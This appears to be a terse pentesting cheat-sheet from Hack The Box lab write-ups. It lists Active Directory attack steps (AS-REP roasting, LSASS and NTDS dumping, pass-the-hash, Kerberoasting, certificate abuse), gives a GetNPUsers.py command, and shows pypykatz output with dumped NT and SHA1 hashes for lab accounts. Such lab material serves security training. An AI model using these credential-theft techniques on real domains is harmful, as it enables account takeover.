Methodology

methodology

Metodología

ASPRepRoast Attack

GetNPUsers.py blackfield.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.192

Decrypt LSASS

pypykatz lsa minidump lsass.DMP

INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
[...]
    == MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        LM: NA
        NT: 9658d1d1dcd9250115e2205d9f48400d
        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
[...]
luid 153705
    == MSV ==
        Username: Administrator
        Domain: BLACKFIELD
        LM: NA
        NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
        SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368

Dumpear NTDS

Backup del System

Backup del NTDS

Creación de unidad lógica temporal

Fichero.txt

Procesación con DiskShadow

Copia de RoboCopy

Dumpeo hashes NT,LM

PassTheHash

Kerberoasting Attack

SCF Malicioso

Microsoft Active Directory Certificate Services

Generar certificados

Tráfico de Red

Obtener clave SSL para importar en WireShark

Desencriptar LSASS

Obtener macros de documento

Crear diccionario de usuarios a partir de nombres

Certificado PFX

Crack hash

Importar al navegador

Permite tener acceso a recursos que de primera devuelven un código de estado 403, por ejemplo

https://rubbxalc.github.io/writeups/assets/img/Search-htb/17.png

image

Strings | Obtener más información con un encoder

Last updated